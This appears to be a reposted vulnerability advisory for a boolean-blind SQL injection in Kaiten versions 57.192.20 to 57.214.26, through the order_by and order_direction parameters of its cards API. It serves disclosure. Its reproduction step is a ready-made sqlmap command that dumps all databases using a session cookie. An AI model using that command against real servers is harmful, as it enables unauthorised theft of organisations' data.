## https://sploitus.com/exploit?id=D3F1FC0B-316D-51DC-AF3E-6F01630B1882
# CVE-2026-00000
## Boolean-blind SQL injection
**Description**: Dynamic SQL statements are generated without the required data validation and without using parameterized statements or stored procedures.
**Impact**: SQLi
**CVSSv3.1 vector**: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (**9.9** **Critical**)
**CWE**: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
**Affected Component**: GET parameters `order_by` & `order_direction`
**Vendor**: [kaiten](https://kaiten.ru/)
## Affected Product
- kaiten versions: from 57.192.20 to 57.214.26
## Steps to reproduce:
1. sqlmap -u "https://[kaiten ip]/api/cards?version=2&limit=51&query=1&order_by=1&order_direction=desc&search_fields=title" --cookie="connect.sid=[value]" -p 'order_by' --technique B --level 5 --dbms postgresql --dbs --dump
2. Type n (no merge your cookie with new one) -> C
## Discoverer
- Danil Belov
## References
- https://nvd.nist.gov/vuln/detail/CVE-2026-00000
- https://bdu.fstec.ru/vul/2025-02933
- https://kaiten.ru/